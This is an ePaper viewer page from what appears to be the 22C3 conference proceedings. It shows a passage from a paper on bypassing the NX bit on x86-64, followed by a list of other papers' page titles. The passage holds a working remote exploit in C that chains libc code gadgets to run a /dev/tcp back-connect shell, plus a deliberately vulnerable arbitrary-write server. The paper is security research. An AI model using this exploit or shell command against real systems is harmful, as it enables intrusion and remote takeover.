Proceedings

More documents

Recommendations

Info

| 110 5 AND DOES THIS REALLY WORK? 7 That’s an instruction sequence which fills all the registers we need with values controlled by the attacker. This code snippet will actually be a call to system(”sh /dev/tcp/127.0.0.1/8080”) which is a back-connect shellcode. 5 And does this really work? Yes. Client and server program can be found at [10] so you can test it yourself. If you use a different target platform than mine you might have to adjust the addresses for the libc functions and the borrowed instructions. Also, the client program wants to be compiled on a 64 bit machine since otherwise the compiler complains on too large integer values. 1 void exploit(const char *host) 2 { 3 int sock = -1; 4 char trigger[4096]; 5 size_t tlen = sizeof(trigger); 6 struct t_stack { 7 char buf[1024]; 8 u_int64_t rbx; // to be moved to %rax to be called as *eax = system(): 9 // 0x0000000000400a82 : pop %rbx 10 // 0x0000000000400a83 : retq 11 u_int64_t ulimit_133; // to call: 12 // 0x00002aaaaac743d5 : mov %rbx,%rax 13 // 0x00002aaaaac743d8 : add $0xe0,%rsp 14 // 0x00002aaaaac743df : pop %rbx 15 // 0x00002aaaaac743e0 : retq 16 // to yield %rbx in %rax 17 char rsp_off[0xe0 + 8]; // 0xe0 is added and one pop 18 u_int64_t setuid_52; // to call: 19 // 0x00002aaaaac50bf4 : mov %rsp,%rdi 20 // 0x00002aaaaac50bf7 : callq *%eax 21 char system[512]; // system() argument has to be *here* 22 } __attribute__ ((packed)) server_stack; 23 char *cmd = "sh < /dev/tcp/127.0.0.1/3128 > /dev/tcp/127.0.0.1/8080;"; 24 //char nop = ’;’; 25 memset(server_stack.buf, ’X’, sizeof(server_stack.buf)); 26 server_stack.rbx = 0x00002aaaaabfb290; 27 server_stack.ulimit_133 = 0x00002aaaaac743d5; 28 memset(server_stack.rsp_off, ’A’, sizeof(server_stack.rsp_off)); 29 server_stack.setuid_52 = 0x00002aaaaac50bf4; 30 memset(server_stack.system, 0, sizeof(server_stack.system)-1); 31 assert(strlen(cmd) < sizeof(server_stack.system)); 32 strcpy(server_stack.system, cmd); 33 if ((sock = tcp_connect(host, 1234)) < 0) 34 die("tcp_connect"); 35 read(sock, trigger, sizeof(trigger)); 36 assert(tlen > sizeof(server_stack)); 37 memcpy(trigger, &server_stack, sizeof(server_stack)); 38 writen(sock, trigger, tlen); 39 usleep(1000); 40 read(sock, trigger, 1); 41 close(sock); 42 } NO-NX To make it clear, this is a remote exploit for the sample overflow server, not just some local theoretical proof of concept that some instructions can be executed. The attacker will get full shell access.
DER HAMMER: X86-64 UND DAS UM-SCHIFFEN DES NX BITS 6 SINGLE WRITE EXPLOITS 8 6 Single write exploits The last sections focused on stack based overflows and how to exploit them. I already mentioned that heap based buffer overflows or format string bugs can be mapped to stack based overflows in most cases. To demonstrate this, I wrote a second overflow server which basically allows you to write an arbitrary (64-bit) value to an arbitrary (64-bit) address. This scenario is what happens under the hood of a so called malloc exploit or format string exploit. Due to overwriting of internal memory control structures it allows the attacker to write arbitrary content to an arbitrary address. A in depth description of the malloc exploiting techniques can be found in [8]. 1 #include 2 #include 3 #include 4 #include 5 #include 6 #include 7 #include 8 #include 9 #include 10 #include 11 #include 12 void die(const char *s) 13 { 14 perror(s); 15 exit(errno); 16 } 17 int handle_connection(int fd) 18 { 19 char buf[1024]; 20 size_t val1, val2; 21 write(fd, "OF Server 1.0\n", 14); 22 read(fd, buf, sizeof(buf)); 23 write(fd, "OK\n", 3); 24 read(fd, &val1, sizeof(val1)); 25 read(fd, &val2, sizeof(val2)); 26 *(size_t*)val1 = val2; 27 write(fd, "OK\n", 3); 28 return 0; 29 } 30 void sigchld(int x) 31 { 32 while (waitpid(-1, NULL, WNOHANG) != -1); 33 } 34 int main() 35 { 36 int sock = -1, afd = -1; 37 struct sockaddr_in sin; 38 int one = 1; 39 printf("&sock = %p system=%p mmap=%p\n", &sock, system, mmap); 40 if ((sock = socket(PF_INET, SOCK_STREAM, 0)) < 0) 41 die("socket"); 42 memset(&sin, 0, sizeof(sin)); 43 sin.sin_family = AF_INET; 44 sin.sin_port = htons(1234); 45 sin.sin_addr.s_addr = INADDR_ANY; NO-NX 46 setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one)); 47 if (bind(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0) 111 |
Page 2 and 3:
| 2
Page 5 and 6:
22. Chaos Communication Congress Pr
Page 7 and 8:
REPORTS 7 5 Thesis on Informational
Page 9 and 10:
10 5 Thesis on Informational- Cogni
Page 11 and 12:
5 THESIS ON INFORMATIONAL-COGNITIVE
Page 13 and 14:
Page 15 and 16:
Page 17:
Page 20 and 21:
UQBTng: a tool capable of automatic
Page 22 and 23:
IV. UQBT MODIFICATIONS A. Summary A
Page 24 and 25:
• if LHS of A is exactly sem str,
Page 27 and 28:
Advanced Buffer Overflow Methods [o
Page 29 and 30:
ADVANCED BUFFER OVERFLOW METHODS #i
Page 31 and 32:
ADVANCED BUFFER OVERFLOW METHODS 0x
Page 33 and 34:
ADVANCED BUFFER OVERFLOW METHODS in
Page 35:
ADVANCED BUFFER OVERFLOW METHODS }
Page 38 and 39:
| 34 Eine Führung in das europäis
Page 40 and 41:
| 36 Die kryptische Kennung 10 eine
Page 42 and 43:
| 38 senvertreter angewiesen. Die
Page 44 and 45:
| 40 Anonymous Data Broadcasting by
Page 46 and 47:
| 42 operate, consider the setting,
Page 48 and 49:
| 44 Figure 1: Anonymous data broad
Page 51 and 52:
Autodafé: An Act of Software Tortu
Page 53 and 54:
AUTODAFE - AN ACT OF SOFTWARE TORTU
Page 55 and 56:
Page 57 and 58:
Page 59 and 60:
Page 61 and 62:
Bad TRIPs What the WTO Treaty did i
Page 63 and 64: BAD TRIPS The TRIPS is especially h
Page 65: BAD TRIPS Extension of the transiti
Page 68 and 69: | 64 Collateral Damage Consequences
Page 70 and 71: | 66 If one considers a DNSBL listi
Page 72 and 73: | 68 • A number of sites do not h
Page 74 and 75: | 70 to use other mailing software.
Page 76 and 77: | 72 These kinds of checks tend to
Page 79 and 80: COMPLETE Hard Disk Encryption with
Page 81 and 82: COMPLETE HARD DISK ENCRYPTION WITH
Page 105: COMPLETE HARD DISK ENCRYPTION WITH
Page 108 and 109: | 104 x86-64 buffer overflow exploi
Page 110 and 111: | 106 3 ELF64 LAYOUT AND X86-64 EXE
Page 112 and 113: | 108 4 THE BORROWED CODE CHUNKS TE
Page 116 and 117: | 112 6 SINGLE WRITE EXPLOITS 9 48
Page 118 and 119: | 114 6 SINGLE WRITE EXPLOITS 11 34
Page 120 and 121: | 116 7 AUTOMATED EXPLOITATION 13 A
Page 122 and 123: | 118 7 AUTOMATED EXPLOITATION 15 W
Page 124 and 125: | 120 8 RELATED WORK 17 32 read(soc
Page 126 and 127: | 122 11 CREDITS 19 11 Credits Than
Page 129 and 130: Developing Intelligent Search Engin
Page 131 and 132: DEVELOPING INTELLIGENT SEARCH ENGIN
Page 133 and 134: DEVELOPING INTELLIGENT SEARCH ENGIN
Page 135 and 136: Digital Identity and the Ghost in t
Page 137 and 138: DIGITAL IDENTITY AND THE GHOST IN T
Page 145: DIGITAL IDENTITY AND THE GHOST IN T
Page 148 and 149: | 144
Page 150 and 151: | 146
Page 153 and 154: Esperanto, die internationale Sprac
Page 155 and 156: ESPERANTO, DIE INTERNATIONALE SPRAC
Page 157 and 158: ESPERANTO, DIE INTERNATIONALE SPRAC
Page 159 and 160: Fair Code Free/Open Source Software
Page 161 and 162: FAIR CODE 2. Von Digital Divide zu
Page 163 and 164: FAIR CODE ökonomisch schlecht gest
Page 165 and 166:
FAIR CODE menschliches Verhalten re
Page 167:
FAIR CODE gewährleistet, und nur d
Page 170 and 171:
��
Page 172 and 173:
| 168 ��
Page 174 and 175:
| 170 ��
Page 176 and 177:
| 172 ��
Page 178 and 179:
| 174 ��
Page 180 and 181:
| 176 ��
Page 183 and 184:
Fuzzing Breaking software in an aut
Page 185 and 186:
FUZZING or protocol and fuzzing fra
Page 187 and 188:
FUZZING #define SOME_MAX 4096 if (y
Page 189 and 190:
Geometrie ohne Punkte, Geraden & Eb
Page 191 and 192:
GEOMETRIE OHNE PUNKTE, GERADEN & EB
Page 193:
GEOMETRIE OHNE PUNKTE, GERADEN & EB
Page 196 and 197:
| 192
Page 198 and 199:
| 194
Page 200 and 201:
| 196
Page 203 and 204:
Hacking OpenWRT Felix Fietkau 199 |
Page 205 and 206:
HACKING OPENWRT 1 Introduction to O
Page 207 and 208:
HACKING OPENWRT 3.2 Makefile This f
Page 209 and 210:
HACKING OPENWRT If your package is
Page 211 and 212:
HACKING OPENWRT 4.2 toolchain/ tool
Page 213 and 214:
HACKING OPENWRT To add a new platfo
Page 215 and 216:
Hopalong Casualty On automated vide
Page 217 and 218:
HOPALONG CASUALTY 2 Intro to Visual
Page 219 and 220:
HOPALONG CASUALTY Appearance As hum
Page 221 and 222:
HOPALONG CASUALTY A thorough review
Page 223 and 224:
Hosting a Hacking Challenge - CTF-s
Page 225 and 226:
HOSTING A HACKING CHALLENGE - CTF-S
Page 227 and 228:
Page 229:
Page 232 and 233:
| 228 1 Introduction Intrusion Dete
Page 234 and 235:
| 230 • Changing file owner / gro
Page 236 and 237:
| 232 Figure 2: Simple correlation
Page 239 and 240:
Lyrical I Abschluss des CCC-Poesie-
Page 241 and 242:
Magnetic Stripe Technology Joseph B
Page 243 and 244:
MAGNETIC STRIPE TECHNOLOGY black re
Page 245 and 246:
MAGNETIC STRIPE TECHNOLOGY My curre
Page 247 and 248:
MAGNETIC STRIPE TECHNOLOGY MetroCar
Page 249 and 250:
��
Page 251 and 252:
Code Listing (dmsb.c) ��
Page 253 and 254:
Memory allocator security Yves Youn
Page 255 and 256:
MEMORY ALLOCATOR SECURITY 251 |
Page 257 and 258:
MEMORY ALLOCATOR SECURITY 253 |
Page 259 and 260:
Message generation at the info laye
Page 261 and 262:
MESSAGE GENERATION AT THE INFO LAYE
Page 263 and 264:
Page 265 and 266:
Page 267 and 268:
Page 269:
Page 272 and 273:
| 268 Abstract Open Source, EU Fund
Page 274 and 275:
| 270 lines of code x1e5 1.8 1.6 1.
Page 276 and 277:
| 272 cooperation. Getting the new
Page 278 and 279:
| 274 PyPy - The new Python Impleme
Page 280 and 281:
| 276 performs abstract interpretat
Page 282 and 283:
| 278 adding short cuts for some co
Page 284 and 285:
| 280
Page 286 and 287:
| 282
Page 288 and 289:
| 284
Page 290 and 291:
| 286
Page 292 and 293:
| 288
Page 294 and 295:
| 290
Page 296 and 297:
| 292
Page 298 and 299:
| 294 Die Risiken der Nanotechnik N
Page 300 and 301:
| 296 Neue Materialien, einer der P
Page 302 and 303:
| 298 wahrscheinlich nicht ausreich
Page 304 and 305:
| 300 „State of the Future 2005
Page 307 and 308:
The Web according to W3C How to tur
Page 309 and 310:
THE WEB ACCORDING TO W3C 305 |
Page 311 and 312:
THE WEB ACCORDING TO W3C 307 |
Page 313:
THE WEB ACCORDING TO W3C our proces
Page 316 and 317:
| 312 Transparenz der Verantwortung
Page 318 and 319:
| 314 Transparenz der Verantwortung
Page 320 and 321:
| 316 (6) Wird dem Betroffenen kein
Page 322 and 323:
| 318 „anonymes Staatshandeln“
Page 324 and 325:
| 320 Die Einschränkungen der Grun
Page 326 and 327:
| 322 11 wie es insbesondere an Hei
Page 328 and 329:
��
Page 330 and 331:
��
Page 332 and 333:
| 328 ��
Page 335 and 336:
Wargames - Hacker Spielen Männlich
Page 337 and 338:
WARGAMES - HACKER SPIELEN 333 |
Page 339 and 340:
Page 341 and 342:
Page 343 and 344:
Page 345 and 346:
Page 347 and 348:
Page 349 and 350:
Page 351 and 352:
Page 353 and 354:
Page 355 and 356:
Was ist technisches Wissen? Philoso
Page 357 and 358:
WAS IST TECHNISCHES WISSEN? ��
Page 359 and 360:
Page 361 and 362:
Page 363 and 364:
Page 365 and 366:
Page 367 and 368:
��
Page 369 and 370:
��
Page 371 and 372:
Page 373:
Page 376 and 377:
| 372 ��
Page 378 and 379:
��
Page 380 and 381:
��
Page 382 and 383:
| 378
Page 384 and 385:
| 380
Page 386 and 387:
| 382
Page 388 and 389:
| 384
Page 390 and 391:
| 386
Page 392 and 393:
| 388
Page 394:
| 390
show all

Proceedings

You also want an ePaper? Increase the reach of your titles

Delete template?

Save as template?